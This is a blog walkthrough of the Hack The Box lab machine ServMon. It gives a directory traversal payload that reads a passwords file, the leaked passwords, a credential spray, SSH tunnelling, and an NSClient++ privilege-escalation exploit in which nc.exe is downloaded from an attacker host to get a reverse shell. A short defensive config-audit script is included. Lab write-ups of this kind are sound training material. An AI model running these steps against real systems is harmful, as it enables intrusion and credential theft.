SecWalk.com

HTB Walkthrough ServMon 10.10.10.184

ServMon was released on the 11th of April and retired on the 20th of June. ServMon is an Easy-rated machine.

Foothold

First we see that we have anonymous access to FTP. There is a file mentioning that a passwords.txt should be on Nathan's desktop. After the web enumeration we find a directory traversal vulnerability, which we can use to fetch passwords.txt from Nathan's desktop.

User

After finding those passwords we still had to work out who they belong to; we used crackmapexec for this. It turns out we have credentials for Nadine. With those we were able to log in over SSH and read the user flag.

Root

After some enumeration we found a program called NSClient++ on the machine. This is not a default application, and after some research it turns out this application has a known vulnerability that gives SYSTEM access.

Enumeration

Nmap

nmap -sC -sV 10.10.10.184

FTP

Anonymous login:

Downloading the file:

The file says there should be a passwords.txt on Nathan's desktop.

Web

http://10.10.10.184

NVMS-1000 is vulnerable to Directory Traversal

https://www.exploit-db.com/exploits/47774

Since the hint on the FTP server tells us there is a passwords.txt on Nathan's desktop, we retrieve it through the traversal using Burp:

/../../../../../../../../../../../../users/nathan/desktop/passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe

L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Now we have some passwords, but we still don't know where to use them or to whom they belong.

From the FTP server we know there should be two users, Nadine and Nathan, so I created a users.txt with these two names and tried them together with the password list in crackmapexec.

crackmapexec smb 10.10.10.184 -u users.txt -p passwords.txt

Valid credentials found:

SERVMON\nadine:L1k3B1gBut7s@W0rk

Now that we have valid credentials we are able to log in with SSH:

ssh nadine@10.10.10.184

Privilege Escalation

After some enumeration we see that NSClient++ is installed, which was also visible in the nmap scan. When we look at the following file we get credentials. It also shows that you cannot log in from the outside, only from localhost:

In the nmap output we could see NSClient++ running on port 8443:

When we log in with the password ew2x6SsGTxjRwXOT we get an error, as expected, since this program only accepts requests from localhost.

Now we can exploit this program in two ways, through the API or through the web interface. I decided to show you a combination of both. In either case we need to create an SSH tunnel so the machine thinks the request comes from localhost.

Exploit source: https://www.exploit-db.com/exploits/46802

Creating the SSH tunnel:

ssh -L 4433:127.0.0.1:8443 nadine@10.10.10.184

Configure Firefox to use the SSH tunnel.

Now we should be able to visit the page at https://127.0.0.1:4433

We should also be able to log in now:

Exploit

The first step is to:

Log in and enable the following modules, including "enable at startup", and save the configuration:
- CheckExternalScripts
- Scheduler

But since these are already enabled on this machine we don't have to worry about that.
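As an added defender's check (my own example, not part of this walkthrough or of NSClient++), the script below audits an NSClient++ nsclient.ini for the two conditions this box relies on: the clear-text password in the config file mentioned above, and CheckExternalScripts/Scheduler enabled next to the web API while "allowed hosts" is only restricted to localhost. The sample INI is constructed; section and key names follow the nsclient.ini layout, the password value is a placeholder, and the accepted true/false spellings are an assumption.

```python
import configparser

# Constructed sample resembling an NSClient++ nsclient.ini (not the box's real file).
SAMPLE_INI = """
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = PLACEHOLDER-NOT-A-REAL-PASSWORD
"""

RISKY_MODULES = ("CheckExternalScripts", "Scheduler")   # modules named in the walkthrough
TRUE_VALUES = {"1", "enabled", "true"}                     # assumed accepted spellings


def parse_nsclient_ini(text: str) -> configparser.ConfigParser:
    """Parse an NSClient++ style INI while preserving key case."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep 'CheckExternalScripts' as written
    cp.read_string(text)
    return cp


def _is_on(value: str) -> bool:
    return value.strip().lower() in TRUE_VALUES


def audit(text: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing flagged."""
    cp = parse_nsclient_ini(text)
    modules = cp["/modules"] if cp.has_section("/modules") else {}
    defaults = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    findings = []

    enabled = [m for m in RISKY_MODULES if _is_on(modules.get(m, ""))]
    if enabled and _is_on(modules.get("WEBServer", "")):
        findings.append("web API reachable with command-execution modules: " + ", ".join(enabled))

    hosts = defaults.get("allowed hosts", "").strip()
    if enabled and hosts in ("", "127.0.0.1", "localhost"):
        # A localhost-only restriction is bypassed by any user who can open an SSH tunnel.
        findings.append("allowed hosts limited to localhost; does not stop a local user tunnelling in")

    if defaults.get("password", "").strip():
        findings.append("API password stored in clear text; restrict the file ACL to administrators")
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_INI):
        print("FINDING:", f)
```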

The next step is to create a batch file and upload it together with nc.exe (netcat).

In the SSH shell I ran the following commands (the Python web server is started on the attacking machine to serve the two files):

powershell

cd c:\temp

python -m SimpleHTTPServer 80

wget http://10.10.14.24/nc.exe -outfile nc.exe

wget http://10.10.14.24/secwalk.bat -outfile secwalk.bat

Set up my listener:

nc -lvp 443

Now it is time to exploit.

Earlier I said it is also possible to do this through the web page or through the API; here I show the combination of both:

curl -k -i -X PUT -u admin https://127.0.0.1:4433/api/v1/scripts/ext/scripts/secwalk.bat --data-binary @secwalk.bat

curl -k -s -H 'password: ew2x6SsGTxjRwXOT' 'https://127.0.0.1:8443/core/reload'

Now we run secwalk from the web page.

And we receive our admin shell.

Job Done

Made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
